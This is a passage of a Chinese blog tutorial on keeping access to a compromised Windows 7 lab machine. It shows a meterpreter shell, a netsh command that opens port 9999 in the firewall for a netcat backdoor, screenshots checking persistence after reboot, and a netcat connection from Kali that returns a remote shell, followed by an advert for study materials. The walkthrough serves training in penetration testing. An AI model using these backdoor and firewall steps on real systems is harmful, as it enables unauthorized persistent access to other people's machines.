【网络安全】内网渗透NC木马后门复现_成功入侵靶机后(1)

最新推荐文章于 2024-07-25 17:06:06 发布

2401_83739632

最新推荐文章于 2024-07-25 17:06:06 发布

阅读量306

点赞数 4

分类专栏： 2024年程序员学习文章标签： web安全安全

本文链接：https://blog.csdn.net/2401_83739632/article/details/137732666

版权

2024年程序员学习专栏收录该内容

293 篇文章 0 订阅

订阅专栏


3、进入Shell

meterpreter > shell

输出

Process 1548 created.
Channel 2 created.
Microsoft Windows [°汾 6.1.7600]
°爨̹Ԑ © 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£

改变编码

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001


 4、创建防火墙规则

C:\Windows\system32>netsh firewall add portopening TCP 9999 “Netcat” ENABLE ALL

输出

netsh firewall add portopening TCP 9999 “Netcat” ENABLE ALL

IMPORTANT: Command executed successfully.
However, “netsh firewall” is deprecated;
use “netsh advfirewall firewall” instead.
For more information on using “netsh advfirewall firewall” commands
instead of “netsh firewall”, see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .

Ok.


二、重启Win7靶机，并查看


1、查看开机启动项


![](https://img-blog.csdnimg.cn/direct/d67d820ae0d94fea9d9395a1ab90aeba.png)


2、查看防火墙规则


![](https://img-blog.csdnimg.cn/direct/05bbb8544fe047539a0afb012137ad87.png)


3、查看进程


![](https://img-blog.csdnimg.cn/direct/dc278ad14c7848d8b8a13ef52de35986.png)


三、验证后门


1、连接靶机

┌──(root?Kali)-[~]
└─# nc -v 10.3.0.234 9999

输出

10.3.0.234: inverse host lookup failed: Unknown host
(UNKNOWN) [10.3.0.234] 9999 (?) open
Microsoft Windows [°汾 6.1.7600]
°爨?? © 2009 Microsoft Corporation??±???{??



**自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。**

**深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！**

**因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/f58f2e1f7090ee9349afa9c0bbeb44e9.png)
![img](https://img-blog.csdnimg.cn/img_convert/dc873dbcc3a9772773489f12c3e8a362.png)
![img](https://img-blog.csdnimg.cn/img_convert/764e344ea2699c870651860e700886ce.png)
![img](https://img-blog.csdnimg.cn/img_convert/231fb83ea3e3a2ed6616ec0db7fccbd6.png)
![img](https://img-blog.csdnimg.cn/img_convert/d22a593a04ad2b8e3a511fadaefc533a.png)
![img](https://img-blog.csdnimg.cn/img_convert/dfc2cc24ef37c126237657a368515dec.png)

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新**

**如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）**
![img](https://img-blog.csdnimg.cn/img_convert/167a75b949a853082ce0d554e3ad71a8.png)



### 给大家的福利


**零基础入门**


对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。


![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)


同时每个成长路线对应的板块都有配套的视频提供：


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)


因篇幅有限，仅展示部分资料

**一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**
![img](https://img-blog.csdnimg.cn/img_convert/80ffe4e49f87c7f061914ba97a9d44ed.png)

更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**
[外链图片转存中...(img-6Tu9zYiq-1713042183089)]